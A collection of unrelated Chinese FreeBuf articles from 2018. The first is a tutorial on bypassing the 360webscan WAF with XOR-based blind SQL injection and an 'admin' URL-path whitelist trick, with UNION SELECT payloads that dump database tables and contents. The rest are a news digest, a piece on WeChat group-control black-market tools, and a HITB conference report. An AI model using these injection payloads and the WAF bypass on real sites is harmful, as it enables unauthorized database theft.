*本文作者:GGyao6,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

PS:此网站漏洞已被处理,本文内容仅供技术交流,严禁用于非法用途。

前言

今天测试了一个网站,发现存在360webscan的拦截,于是便开始了一波“bypass”。

进入主题

1. 判断注入点

使用“and 1=1”测试了一下,惨遭拦截。随后又测试了一下or也是被拦截的。

判断注入点

但是按位异或运算(^)未被拦截也可以使用xor。

“按位异或运算”测试:

在这里先介绍下“按位异或运算”,这种测试注入点的方法最开始是看一位大佬发过,原谅我已经找不到这位大佬的文章了。但是这位大佬并未解释使用这种方法的具体原理是什么,下面我给大家简单介绍一下按位异或运算使用的基本规则:

1^1=0

1^0=1

0^0=0

具体原理参考:https://blog.csdn.net/zpy1998zpy/article/details/80667775

栗子:

栗子

在这里我们对我们的网站进行测试:

页面正常payload:xxxnid=216^(1=1)^1

在这里我们对我们的网站进行测试

在这里我们对我们的网站进行测试

在这里我们对我们的网站进行测试

3. 使用“按位异或运算”判断一下当前数据库名称的长度:

Payload:xxxnid=216^(1=(if(1=(length(database())=1 ),1,0)))^1

然后我们打开bp,将抓取到的数据包发送到intruder模块,然后把数据库长度值设置为变量。

 使用“按位异或运算”判断一下当前数据库名称的长度

payload type设置为numbers遍历1-15这15个数字。

 使用“按位异或运算”判断一下当前数据库名称的长度

最终我们得到数据库字段的长度为13。

 使用“按位异或运算”判断一下当前数据库名称的长度

4. 使用“按位异或运算”结合盲注来获取数据库名称:

这里我们使用的是regexp正则注入,简单介绍一下:

用法:select user() regexp ‘^[a-z]’;

这里是在匹配用户名的第一位:

这里是在匹配用户名的第一位

继续匹配第二位的用法:select user() regexp ‘^r[a-z]’;

类似的盲注方法还有like匹配注入、left()函数、mid()函数、substr()函数等等。

构造Payload:xxxnid=216^(1=if(((database())regexp '^a ' ),1,0))^1

在这里我们将从数据库的第一个字段开始进行盲注。

进行盲注

这里我们使用字典来爆破字段名称,我们指定的字典内容包括常用的大小写字母、特殊符号、数字等。在这里的时候我遇到了个坑,我使用的字典里没加入数字,但是数据库名称里包含数字,导致我爆破到第三个参数的时候就没有结果了,最后发现字典里没把数字加进去,真的是贼菜。

用字典来爆破

爆破出数据库的第一个参数是“p”。

第一个参数是“p”

依次爆破,最终我们得到了数据库名称。

得到了数据库名称

5. 接下来就是构造获取表名的payload了。

我们使用left()函数进行构造,先来看一个的栗子:

select left((select table_name frominformation_schema.tables where table_schema='test' limit 0,1),1)='u';

构造获取表名的payload

由此我们可以构造payload为:

xxxnid=216^(1=left((select table_namefrom information_schema.tables where table_schema=database() limit0,1),1)='u')^1

构造payload

事情并不是一帆风顺的,360webscan再次拦截,经测试,拦截的是from关键字,这就很难受了,测试了很多方法都没有绕过过滤,内联注释、编码、干扰正则等方法都没办法。

将from加上别的字符就不拦截。。

不拦截

6. 最后还是找到了“楼兰”大佬帮忙。

大佬告诉我,360的webscan是可以绕过的,原来360webscan自己有定义一个白名单,只要URL路径中出现了admin等关键字时候就能绕过检测。

后来大佬又给我推荐了一篇文章,讲的是绕过360webscan的原理,这篇文章讲的真好,附上文章链接:https://www.leavesongs.com/penetration/360webscan-bypass.html。后来我在网上一搜,原来已经有不少前辈研究过这个绕过方法啦,需要学习的东西真的很多,加油!

最后自己也去看了一下360webscan的源码,白名单如下:(代码地址:https://github.com/baiqj/host_manager/tree/master/other/360safe

白名单

再次构造payload:xxx/xxx/admin /?nid=216 union select 1,2,3,4,5,6,7,8 -- -

再次构造payload

再次构造payload

7. 接下来就好说了,都是常规操作了

这里我们先看一下当前数据库名称,可以看到,和我们之前盲注得到的数据库名称是一致的。

Payload:xxx/xxx/admin/?nid=1union select database(),2,3,4,5,6,7,8 -- -

常规操作

接下来是爆出所有的表名:

Payload:xxx/xxx/admin/?nid=1 unionselect group_concat(table_name),2,3,4,5,6,7,8 from information_schema.tableswhere table_schema=database() -- -

爆出所有的表名

爆出所有字段名称:

Payload:xxx/xxx/admin/?nid=1union select group_concat(column_name),2,3,4,5,6,7,8 frominformation_schema.columns where table_name='表名' -- -

爆出所有字段

爆字段内容:

Payload:xxx/xxx/admin/?nid=1union select group_concat(字段1),group_concat(字段2),3,4,5,6,7,8 from 表名 -- -

爆字段内容

 总结

1. 使用“按位异或运算”来判断注入点,绕过一些过滤了and、or等一些关键字的waf,真的是非常不错的姿势。

2. 我们在一个页面找不到可显字段的时候,可以换几个页面试一下,也可以将前面参数id值改为负,这样都可以让可显字段回显到页面上。

3. 最后一点,就是最后通过在路径中添加白名单关键字“admin”绕过网站的防护,这个思路真的非常棒。

*本文作者:GGyao6,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

各位 Buffer 早上好,今天是 2018 年 11月 1 日星期四,农历九月廿四。今天的早餐铺内容有:苹果发布iOS 12.1软件更新,修复大量问题;苹果发布iOS 12.1更新后,数小时内就出现新的iPhone密码绕过漏洞;微软将印度客户银行数据分享给美国情报机构;我国出台《国际刑事司法协助法》回应美国Cloud Act;北京互联网法院首案昨日开庭:原被告视频连线。

页首配图

苹果发布iOS 12.1软件更新,修复大量问题

苹果发布iOS 12.1软件更新,修复大量问题

在更新iPad Pro、Mac Mini和MacBook Air产品阵容的同时,苹果今天还发布了iOS 12.1系统,带来了包括支持eSIM、群组FaceTime、实时景深控制和全新Emoji在内的诸多新功能。iOS 12.1还解决了iPhone XS/XS Max/XR用户面临的信号差和美颜门两个问题。

此外,iOS 12.1还修复了多个重大安全漏洞,包括iOS 12.1、Safari 12.0.1、iCloud for Windows、iTunes、watchOS 5.1、tvOS 12.1和macOS。其中iOS 12.1修复了多个FaceTime漏洞,macOS High Sierra更新修复了同一Wi-Fi网络内恶意数据包导致苹果设备崩溃和重启的漏洞。[来源:bleepingcomputer]

苹果发布iOS 12.1更新后,数小时内就出现新的iPhone密码绕过漏洞

iPhone密码绕过漏洞

据外媒报道,虽然苹果为iOS 12发布了安全补丁,修复了多个问题,但iOS专家、黑客Jose Rodriguez在iOS 12.1中发现了又一个漏洞,即可以在绕过密码的情况下使用群组FaceTime访问联系人列表。用户可以通过接听电话或让Siri打电话然后切换到FaceTime上来利用密码绕过漏洞。

一旦切换到FaceTime状态下,即便设备还处于锁屏状态,用户只要进入右下角菜单并点击“添加联系人”之后就可以访问iPhone上的完整联系人列表。另外,在访问联系人列表之后,用户还能通过使用iOS 3D Touch功能查看地址簿的每一位联系人的额外信息并且还能发起新的通话。Rodriguez表示,他发现这个新的密码绕过漏洞可以在所有支持苹果群组FaceTime功能的iPhone机型上使用。不过他也指出,若想要解决掉这个漏洞则可以通过关闭Siri在主屏幕上使用功能就可以。[来源:thehackernews]

微软将印度客户银行数据分享给美国情报机构

微软将印度客户银行数据分享给美国情报机构

据外媒报道,来自DNA Money分享的一份最新报告显示,微软向美国情报机构披露了其印度客户的个人财务细节信息。报告称,微软将客户转移到Microsoft Office 365上的银行数据分享给了美国情报机构。报告还指出,消费者对微软的这一行为并不知情。

此外,报告还披露,微软在美国收到了4000多个来自政府要求提供印度客户的请求或法律要求,期间它至少披露了3036次信息。然而根据微软跟印度银行达成的协议,微软只有在得到印度政府或印度法院颁布的命令时才能访问和共享数据。对此,微软方面回应称,任何政府都无权直接访问他们用户的任何数据,对于他们来说,数据隐私是头等大事,他们从不提供客户数据,除非他们收到了关于特定账户或个人标识的合法有效文件、传票等,同时还得让他们认为目标账户或标识符合法律规定且还符合其公司的相关规定。[来源:cnbeta]

我国出台《国际刑事司法协助法》回应美国Cloud Act

我国出台《国际刑事司法协助法》回应美国Cloud Act

2018年10月26日,十三届全国大人常委会第六次会议表决通过了《国际刑事司法协助法》,该法自公布之日起施行。该法的制定为我国政府今后缔结刑事司法协助条约,以及在此基础上履行义务和行使权利提供了国内法基础,填补了刑事司法协助国际合作的法律空白。

其中,就刑事调查取证方面,该法律第四条第三款规定,“非经中华人民共和国主管机关同意,外国机构、组织和个人不得在中华人民共和国境内进行本法规定的刑事诉讼活动,中华人民共和国境内的机构、组织和个人不得向外国提供证据材料和本法规定的协助。”增加了关于禁止境内组织或个人向外国提供证据材料的规定。这一修订并非凭空出台,而是事出有因。[来源:安全内参]

北京互联网法院首案昨日开庭:原被告视频连线

北京互联网法院首案昨日开庭:原被告视频连线

今年9月9日,随着北京互联网法院挂牌成立,该院电子诉讼平台正式对社会公众开放。“抖音短视频”诉“伙拍小视频”著作权权属、侵权纠纷成为北京互联网法院受理的第一案,昨日上午9点半,北京互联网法院张雯院长作为审判长敲响法槌,公开开庭审理了该案。

在昨天的庭审现场,案件以全程在线的方式进行审理。原被告双方都不需要到庭,而是通过远程登录北京互联网法院电子诉讼平台的方式参加诉讼。庭审现场通过法庭正前方墙面上的一块长条形电子屏幕以视频的方式呈现。大屏幕被分为三块,左右两侧分别为原被告的影像,中间则是审判席。[来源:IT之家]

*Freddy 编译整理,转载请注明来自 FreeBuf.COM。

你一定也有过这样的经历,加入一个新群不久,马上有群友来加你微信。起初,我还以为是自己魅力无边,自带出场特效,后来被套路多了才知道,是自己想太多了,微商加人的标准大概就是,是个人就行了。

可话说回来,想到这些微商不辞辛劳的把群友挨个儿加了一遍,还是莫名的感觉很受鼓舞的。

 不过,这两年随着微商“营销”技术的突飞猛进,上述这些行为已成为过去式,现在微商加人可都步入自动化阶段啦。

这边就挑了几个微商“营销”常见技术,给大家介绍下:

1.全国模拟定位加附近人

可以定位全国任意地点,添加附近的人。漂流瓶、摇一摇也没问题,花式加好友。

01.jpg2.微信群批量添加好友 

群内逐个加好友,这种远古级操作如今可都不好意思说出口了,一键添加所有群友才是常规操作。

02.jpeg3.自动回复聊天

微商生意做火了,忙不过来不可避免,以前只能在淘宝卖家那里看到的关键词回复聊天,便很合时宜的迁移到微信里。

03.jpeg4.定时发朋友圈,朋友圈批量点赞和评论等功能

朋友圈是微商产品展示的重要途径,什么时候发朋友圈关注度最高,怎样保证与好友的及时互动,要想生意做的好,这些都是一名优秀的微商应该考虑在内。

04.jpg以上这些功能都只是单个账号的运营,流量即是商机,微信号有5000人的好友上线,这个数字是远远不能满足微商的需求。一般小一点的微商,是一个手机几个小号来回切换,但这操作太过繁琐,还有封号风险。于是,群控技术应运而生。

5.群控技术

群控之前我们介绍过,这边再引用下官方介绍“群控技术,解放人力,解放双手,通过一台电脑控制百部。一种全新的营销方式,真正的营销利器。”它除了支持微信,QQ、陌陌也都能应用。

05.jpg这次我特意联系了供应商,了解了下群控的价格,它是根据需求提供多个档次,最高配置是100控,价格为19900,包括100台手机,还有主机,软件。乍一看感觉十分良心,可仔细一瞧,就会发现最关键的系统软件是只有首年,后面是要年年续费的,可谓是无利不起早啊~

06.jpg

1个人,100个手机,50万个微信好友,如此规模化的微商产业,让我有种错觉,难道微商从喜提玛莎拉蒂进阶到喜提波音747、高铁的消息是真的?不过一个正常人的智识还是提醒我,你可醒醒吧~

07.jpg

技术原理及应用

我咨询了一位曾参与研发过此类程序的朋友,他表示上述技术实现的难度都不大,比如修改位置,只需通过修改手机的GPS坐标文件就能实现全局位置修改的目的。现在很火的上班定位打卡软件的外挂,也是应用的这个原理。

08.jpg

而群控系统稍微复杂一点,分为4个部分,一是pc端操作软件,二是adb底层传输(电脑和手机的传输通道),三是手机端模拟点击,四是,手机端底层劫持。如果是想控制授权,再加一个部分就是web服务器端授权系统。

技术本无罪,技术用在什么地方才是关键。这些功能单个拎出来,并不能看出多大的危害。 

以代购的微商为例,我自己算是受益者,国内专柜卖到2000多的东西,国外免税店活动期间便宜一半也是常有的事情,所以微信里常年有几个代购。这些微商朋友,若应用加群友技术去拓展客源也无伤大雅。

但可惜的是,这类技术被普遍用于黑产。而且当这些内容全集合在一个软件上,所创造的黑产“生态”不可小觑。 

腾讯官方就表明过对“群控”的态度,正式的定义这类“营销神器”为黑暗产业工具。比如他们会对一些公司举办的优惠活动、免费领取福利下手,比如企业红包、代金券等。利用大批量的微信号去刷这些活动,最后提现或转卖出去来获利。

09.jpg

而定位任意地方的“附近的人”,最常见的使用情境,大概就是不管是加班到深夜的公司,还是在百无聊奈的家中,点开附近的人,都能看到同样的“扫码加我”。

10.jpg

我们以前提到的,除了受害者,其它全是马甲号的炒股群;卖假货的微商通过自己给自己刷流量,营造火爆售卖的假象;还有应用这些海量的账号,刷阅读量,给app刷下载量,冲排行榜的。这些黑产从业者,都是这些技术的主要客户群体。

11.jpg

这个现象也很好理解,因为正规的微商,往往是靠着产品的品质和信誉,去赢得自己的口碑;只有黑产才会想要一个劲儿的扩大受众面,去搜罗那些防范意识低的个体。

 值得注意的是,新的微商法2019年1月1日就要正式实施了。一方面,微商代购也要缴税,我们以前享有的价格优势可能再没有了;但另一方面,通过规定营业执照,禁止“刷好评”“删差评”等相关规定,将很好的打击这些黑产,给消费者一个更加真实、可靠的购物环境。

 不过有了法律也不能一劳永逸,有利益、有欲望,黑产就会永远没有止境,也许会变的更加隐蔽,也许会变为其它形式,身为消费者必须时刻保持警惕心。

*本文作者:GEETEST极验,转载请注明来自FreeBuf.COM

继Defcon、CanSecWest相继落地中国之后,在京东安全的推动下,又一大世界顶级安全峰会 HITB(Hack In The Box) 也来到了中国。如此重磅的消息在国内安全圈也引发了不小的关注,自然吸引了众多黑客大佬的光顾,如京东首席安全专家Tony Lee、TK教主、360 李康教授、GeekPwn创始人王琦,还有 HITB 创始人Dhillon Kannabhiran、传奇黑客 Benjamin Kunz Mejri……

2NvHrb4.jpg

That’s crazy!

中国元素的HITB徽章

HITB 15年来首次来到中国,注入了浓重的中国元素的同时,依然保留了很多特色,例如时常抢戏的定制徽章。本次京东HITB的徽章非常亮眼,正面图案采用极具特色的中国长城元素,配上 HITB 经典红色也恰好是中国红。尽管徽章不过巴掌大小,内心却是个路由器+开发板。

Dqvq5QaUwAAC6mq.jpg

据了解,这枚徽章有两种模式:一是普通模式,包含极具极客范的酷炫的 HTML5 游戏;如果你希望将普通模式转换成黑客模式,则必须要破解胸卡,进入“胸卡 CTF 模式”,与其他成功破解胸卡的极客一同参与游戏比赛。

1231.jpeg

比如笔者手上这款是从一位京东大佬手中掠来的二次 DIY 过的徽章,可惜还没时间把玩,不知道能不能发现什么样的彩蛋~

WGQ20481.jpg

值得一提的是,定制徽章在本次大会上还扮演着重要的角色。京东首席安全专家Tony Lee 和 HITB 创始人Dhillon Kannabhiran 用徽章共同开启了今天的大会的议程。Tony Lee也袒露了推动这次合作的初衷:为了将 HITB 这种极客精神带到中国,培养更多极客人才,共同守护网络安全。

传奇黑客本杰明

在第一天上午的议程中,传奇黑客 Benjamin Kunz Mejri 现身舞台彻底点燃了现场的热情。

GY1_1583_w_b.jpg

作为黑客电影《Who Am I》的男主原型,一个攻陷了美国NASA、一举一动都苹果、微软等知名厂商紧张的男人,竟然还拥有着1米8大长腿、暖男式微笑,集金钱和各种“SkrSkrSkr”的头衔于一身,简直是N多黑客少男少女心中的梦。

AF0A1739_w_b.jpg

不过,你们好像没机会了……

Benjamin 分享了关于信息加密的数据取证、加密信息相关的内容,不过更大的彩蛋留在了第二天的分论坛,届时他将分享一个 最新发现的 iOS 访问权限漏洞,想必一定会引起很多人的关注。

AI怎么认猫?

当天下午的内容分享同样精彩,来自京东安全硅谷研发中心资深安全专家刑新宇教授分享了可解释AI技术价值和应用,其中以AI图像识别为例,目前大多数图像识别技术可以告诉你一张图里有没有猫,但是却不能准确的告诉你为什么AI认为这张图里有猫以及哪些特征能够证明一张图里有猫。

IMG_20181031_140020.jpg

因此,可解释AI技术需要给你想要的答案。通过特定的算法对每一张图片的每一部分进行判定,经过大量的模型训练之后能达到的理想状态是,当你询问一张图里有没有猫时,它能够直接把图片里的猫高亮显示出来给你。

刑新宇表示,这种可解释AI技术就是用来告诉我们深度学习是根据什么判断最终价值的,帮助我们与深度神经网络之间建立信任,而且这也将在未来的安全领域祈祷重要作用。

骨灰级 iOS 越狱大佬

总是说好戏都在后头,下午最后一个出场演讲的正是来自全球最知名的越狱团队 Evad3rs 的核心成员 Nikias Bassen。该团队核心成员2013年就开始发布 iOS 5越狱工具,直到现在他们依然对苹果的安全机制保持着高度的热情(不知道Nikias 会不会去听明天Benjamin分享的关于iOS 漏洞的议题)。

GY1_2373_w_b.jpg

Nikias 分享了自己的越狱简史和心路历程,还透露一个小故事就是,由于他们团队的存在,苹果公司的安全人员甚至曾经连圣诞节都在关注他们的举动,提防他们放出新的 iOS 漏洞。当然,通过寻找漏洞的方式也能够帮助苹果提升设备的安全性,Nikias 表示未来依然会继续这样的研究工作。

场外看点

这次京东 HITB 除了主会场的精彩分享之外,场外也有不少亮点。CommSec Village 作为历届HITB的传统项目,这次也得到了保留,京东、小米、360等多家知名企业的科技展和丰富的实践活动、游戏和讨论会。其中,最不能错过的就是Mitch Altman 焊接体验、HITB 胸牌村和小米的“米兔特工队”以及京东的“Car hacking”。

AF0A2400_w_b.jpg

GY1_2040_w_b.jpg

在京东Car hacking village,你可以体验用电脑黑进游戏车的固件,操控智能车走出迷宫;在 HITB 胸卡village,可以针对文章开头提到的定制徽章进行破解、重新编程,即便是零基础的观众也能够体验到极客的无限乐趣。

WGQ20733_w_b.jpgAF0A1270_w_b.jpg

此外,在主会场外,笔者也见到了京东无人物流体系中的智慧小助手——无人机、分拣机器人、无人叉车等等,而这些除了无人机可以在少数地区见到之外,其它的基本都在京东无人仓内运作,一般人是看不到的。可以预见的是,京东无人物流无论怎么发展,安全必然是首要考虑因素。

京东 HITB 首日的议程结束,接下来的两日除了CommSec Village会持续运作之外,还有几大分论坛的纯技术干货分享,多数是 HITB 上的大咖,更有同期进行的XCTF总决赛,笔者也会持续跟进,捕捉更多精彩内容奉献出来。

现场花絮

WechatIMG13.jpeg

WGQ20048_w_b.jpg

AF0A1960_w_b.jpgGY1_2509_w_b.jpgGY1_2060_w_b.jpgGY1_0800_w_b.jpgWGQ20717_w_b.jpgAF0A1302_w_b.jpg*本文由Andy.i,转载请注明来自FreeBuf.COM